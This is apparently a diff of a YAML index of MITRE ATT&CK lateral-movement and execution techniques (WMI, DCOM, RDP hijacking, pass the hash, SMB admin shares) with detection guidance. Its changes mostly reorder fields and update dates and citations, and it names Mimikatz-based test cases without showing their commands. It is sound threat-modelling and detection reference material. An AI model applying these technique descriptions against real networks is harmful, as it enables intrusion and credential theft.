- - source_name: mitre-attack
- external_id: T1059.003
- url: https://attack.mitre.org/techniques/T1059/003
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
- modified: '2020-03-28T17:02:13.722Z'
- created: '2020-03-09T14:12:31.196Z'
+ id: attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
x_mitre_permissions_required:
@@ -41134,7 +42551,7 @@ execution:
description: |-
Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
- An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)
+ An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
external_references:
- source_name: mitre-attack
external_id: T1047
@@ -41151,6 +42568,10 @@ execution:
description: Microsoft. (n.d.). Windows Management Instrumentation. Retrieved
April 27, 2016.
source_name: MSDN WMI
+ - source_name: FireEye WMI SANS 2015
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
+ description: Devon Kerr. (2015). There's Something About WMI. Retrieved May
+ 4, 2020.
- url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
(WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
@@ -41161,31 +42582,31 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-03-09T14:52:26.618Z'
+ modified: '2020-05-13T22:50:51.258Z'
created: '2017-05-31T21:30:44.329Z'
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Authentication logs
- - Netflow/Enclave netflow
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: 'Monitor network traffic for WMI connections; the use of
- WMI in environments that do not typically use WMI may be suspect. Perform
- process monitoring to capture command-line arguments of "wmic" and detect
- commands that are used to perform remote behavior. (Citation: FireEye WMI
- 2015)'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
x_mitre_system_requirements:
- |-
WMI service, winmgmt, running.
Host/network firewalls allowing SMB and WMI ports from source to destination.
SMB authentication.
+ x_mitre_platforms:
+ - Windows
+ x_mitre_remote_support: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: 'Monitor network traffic for WMI connections; the use of
+ WMI in environments that do not typically use WMI may be suspect. Perform
+ process monitoring to capture command-line arguments of "wmic" and detect
+ commands that are used to perform remote behavior. (Citation: FireEye WMI
+ 2015)'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Netflow/Enclave netflow
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_version: '1.1'
+ x_mitre_is_subtechnique: false
identifier: T1047
atomic_tests:
- name: WMI Reconnaissance Users
@@ -41340,23 +42761,23 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T20:24:52.899Z'
created: '2020-01-30T17:37:22.261Z'
- x_mitre_platforms:
- - Office 365
- - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_detection: Monitor access token activity for abnormal use and permissions
+ granted to unusual or suspicious applications and APIs.
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - OAuth audit logs
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
- Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)
- Mark Wee
- x_mitre_data_sources:
- - Office 365 audit logs
- - OAuth audit logs
- x_mitre_detection: Monitor access token activity for abnormal use and permissions
- granted to unusual or suspicious applications and APIs.
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Office 365
+ - SaaS
atomic_tests: []
T1175:
technique:
@@ -41459,20 +42880,8 @@ lateral-movement:
phase_name: execution
modified: '2020-03-30T13:36:10.069Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_is_subtechnique: false
- x_mitre_remote_support: true
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_detection: |-
- Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
-
- Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
-
- Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.
+ x_mitre_deprecated: true
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- PowerShell logs
- API monitoring
@@ -41482,24 +42891,29 @@ lateral-movement:
- Process monitoring
- Windows Registry
- Windows event logs
- x_mitre_version: '2.0'
- x_mitre_deprecated: true
+ x_mitre_detection: |-
+ Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via [Query Registry](https://attack.mitre.org/techniques/T1012) or [PowerShell](https://attack.mitre.org/techniques/T1086), may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)
+
+ Monitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on.
+
+ Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_remote_support: true
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1021.003:
technique:
- id: attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd
- description: |-
- Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
-
- The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
-
- Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
-
- Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.
- name: Distributed Component Object Model
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-02-11T18:26:36.444Z'
+ modified: '2020-03-23T20:21:03.684Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1021.003
@@ -41540,12 +42954,19 @@ lateral-movement:
description: Tsukerman, P. (2017, November 8). Leveraging Excel DDE for lateral
movement via DCOM. Retrieved November 21, 2017.
source_name: Cyberreason DCOM DDE Lateral Movement Nov 2017
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-23T20:21:03.684Z'
- created: '2020-02-11T18:26:36.444Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Distributed Component Object Model
+ description: |-
+ Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.
+
+ The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)
+
+ Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)
+
+ Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.
+ id: attack-pattern--68a0c5ed-bee2-4513-830d-5b0d650139bd
x_mitre_data_sources:
- Windows event logs
- Windows Registry
@@ -41569,17 +42990,14 @@ lateral-movement:
atomic_tests: []
T1210:
technique:
- id: attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation of Remote Services
- description: |-
- Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
-
- An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
-
- There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)
-
- Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
+ created: '2018-04-18T17:59:24.739Z'
+ modified: '2020-02-04T20:14:11.064Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1210
@@ -41600,14 +43018,17 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-02-04T20:14:11.064Z'
- created: '2018-04-18T17:59:24.739Z'
+ description: |-
+ Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
+
+ An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
+
+ There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)
+
+ Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
+ name: Exploitation of Remote Services
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82
x_mitre_version: '1.1'
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Software exploits may not always succeed or may cause
@@ -41639,7 +43060,7 @@ lateral-movement:
description: |-
Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged attack where an email account is owned either by controlling the user's device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)
- Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) or [Spearphishing Link](https://attack.mitre.org/techniques/T1192) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
+ Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.
There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the attack and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)
name: Internal Spearphishing
@@ -41662,26 +43083,9 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2019-10-22T21:37:05.004Z'
+ modified: '2020-03-31T22:13:33.718Z'
created: '2019-09-04T19:26:12.441Z'
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- x_mitre_detection: 'Network intrusion detection systems and email gateways usually
- do not scan internal email, but an organization can leverage the journaling-based
- solution which sends a copy of emails to a security service for offline analysis
- or incorporate service-integrated solutions using on-premise or API-based
- integrations to help detect internal spearphishing attacks.(Citation: Trend
- Micro When Phishing Starts from the Inside 2017)'
- x_mitre_contributors:
- - Tim MalcomVetter
- - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- - Office 365
- - SaaS
+ x_mitre_is_subtechnique: false
x_mitre_data_sources:
- SSL/TLS inspection
- DNS records
@@ -41690,6 +43094,24 @@ lateral-movement:
- File monitoring
- Mail server
- Office 365 trace logs
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ - Office 365
+ - SaaS
+ x_mitre_contributors:
+ - Tim MalcomVetter
+ - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_detection: 'Network intrusion detection systems and email gateways usually
+ do not scan internal email, but an organization can leverage the journaling-based
+ solution which sends a copy of emails to a security service for offline analysis
+ or incorporate service-integrated solutions using on-premise or API-based
+ integrations to help detect internal spearphishing attacks.(Citation: Trend
+ Micro When Phishing Starts from the Inside 2017)'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
atomic_tests: []
T1570:
technique:
@@ -41717,10 +43139,16 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T22:10:10.862Z'
created: '2020-03-11T21:01:00.959Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: 'Monitor for file creation and files transferred within a
+ network using protocols such as SMB. Unusual processes with internal network
+ connections creating files on-system may be suspicious. Consider monitoring
+ for abnormal usage of utilities and command-line arguments that may be used
+ in support of remote transfer of files. Considering monitoring for alike file
+ hashes or characteristics (ex: filename) that are created on multiple hosts.'
x_mitre_data_sources:
- Process command-line parameters
- File monitoring
@@ -41729,16 +43157,10 @@ lateral-movement:
- Netflow/Enclave netflow
- Network protocol analysis
- Process monitoring
- x_mitre_detection: 'Monitor for file creation and files transferred within a
- network using protocols such as SMB. Unusual processes with internal network
- connections creating files on-system may be suspicious. Consider monitoring
- for abnormal usage of utilities and command-line arguments that may be used
- in support of remote transfer of files. Considering monitoring for alike file
- hashes or characteristics (ex: filename) that are created on multiple hosts.'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1550.002:
technique:
@@ -41771,21 +43193,21 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T16:24:34.766Z'
created: '2020-01-30T16:36:51.184Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: Audit all logon and credential use events and review for
discrepancies. Unusual remote logins that correlate with other suspicious
activity (such as writing and executing binaries) may indicate malicious activity.
NTLM LogonType 3 authentications that are not associated to a domain login
and are not anonymous logins are suspicious.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - System Access Controls
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
identifier: T1550.002
atomic_tests:
- name: Mimikatz Pass the Hash
@@ -41899,23 +43321,23 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-12T17:03:16.122Z'
created: '2020-01-30T17:03:43.072Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Vincent Le Toux
- - Ryan Becwar
- x_mitre_data_sources:
- - Authentication logs
+ x_mitre_defense_bypassed:
+ - System Access Controls
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Kerberos authentication enabled
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)
- x_mitre_system_requirements:
- - Kerberos authentication enabled
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - System Access Controls
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Vincent Le Toux
+ - Ryan Becwar
+ x_mitre_platforms:
+ - Windows
identifier: T1550.003
atomic_tests:
- name: Mimikatz Kerberos Ticket Attack
@@ -41977,20 +43399,20 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T23:24:39.182Z'
created: '2020-02-25T18:35:42.765Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
-
- Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.
x_mitre_data_sources:
- Process monitoring
- Netflow/Enclave netflow
- Authentication logs
+ x_mitre_detection: |-
+ Consider monitoring processes for `tscon.exe` usage and monitor service creation that uses `cmd.exe /k` or `cmd.exe /c` in its arguments to detect RDP session hijacking.
+
+ Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1021.001:
technique:
@@ -42033,27 +43455,27 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-02-25T19:23:34.204Z'
created: '2020-02-11T18:23:26.059Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ x_mitre_system_requirements:
+ - RDP service enabled, account in the Remote Desktop Users group
+ x_mitre_data_sources:
+ - Process monitoring
+ - Netflow/Enclave netflow
+ - Authentication logs
+ x_mitre_permissions_required:
+ - Remote Desktop Users
+ - User
x_mitre_detection: Use of RDP may be legitimate, depending on the network environment
and how it is used. Other factors, such as access patterns and activity that
occurs after a remote login, may indicate suspicious or malicious behavior
with RDP. Monitor for user accounts logged into systems they would not normally
access or access patterns to multiple systems over a relatively short period
of time.
- x_mitre_permissions_required:
- - Remote Desktop Users
- - User
- x_mitre_data_sources:
- - Process monitoring
- - Netflow/Enclave netflow
- - Authentication logs
- x_mitre_system_requirements:
- - RDP service enabled, account in the Remote Desktop Users group
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1021.001
atomic_tests:
- name: RDP hijacking
@@ -42188,34 +43610,35 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T23:35:58.129Z'
created: '2020-02-25T18:26:16.994Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - SYSTEM
- - root
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
-
- Monitor for processes and command-line arguments associated with hijacking service sessions.
x_mitre_data_sources:
- Process command-line parameters
- Process monitoring
- Netflow/Enclave netflow
- Authentication logs
+ x_mitre_detection: |-
+ Use of these services may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with that service. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.
+
+ Monitor for processes and command-line arguments associated with hijacking service sessions.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - SYSTEM
+ - root
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1021:
technique:
- id: attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote Services
- description: |-
- Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
-
- In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)
+ created: '2017-05-31T21:30:29.858Z'
+ modified: '2020-03-25T12:25:03.251Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1021
@@ -42230,14 +43653,13 @@ lateral-movement:
description: Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1,
2016.
source_name: TechNet Remote Desktop Services
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-25T12:25:03.251Z'
- created: '2017-05-31T21:30:29.858Z'
+ description: |-
+ Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.
+
+ In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services)
+ name: Remote Services
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba
x_mitre_is_subtechnique: false
x_mitre_version: '1.1'
x_mitre_detection: Correlate use of login activity related to remote services
@@ -42267,9 +43689,12 @@ lateral-movement:
atomic_tests: []
T1091:
technique:
- id: attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Replication Through Removable Media
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1091
+ external_id: T1091
description: Adversaries may move onto systems, possibly those on disconnected
or air-gapped networks, by copying malware to removable media and taking advantage
of Autorun features when the media is inserted into a system and executes.
@@ -42279,20 +43704,18 @@ lateral-movement:
In the case of Initial Access, this may occur through manual manipulation
of the media, modification of systems used to initially format the media,
or modification to the media's firmware itself.
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1091
- external_id: T1091
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ name: Replication Through Removable Media
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2019-07-18T17:52:28.429Z'
+ modified: '2020-07-14T19:45:59.638Z'
created: '2017-05-31T21:31:08.977Z'
+ x_mitre_is_subtechnique: false
x_mitre_version: '1.0'
x_mitre_data_sources:
- File monitoring
@@ -42313,6 +43736,23 @@ lateral-movement:
atomic_tests: []
T1021.002:
technique:
+ created: '2020-02-11T18:25:28.212Z'
+ modified: '2020-03-23T21:16:02.812Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ id: attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541
+ description: |-
+ Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
+
+ SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
+
+ Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
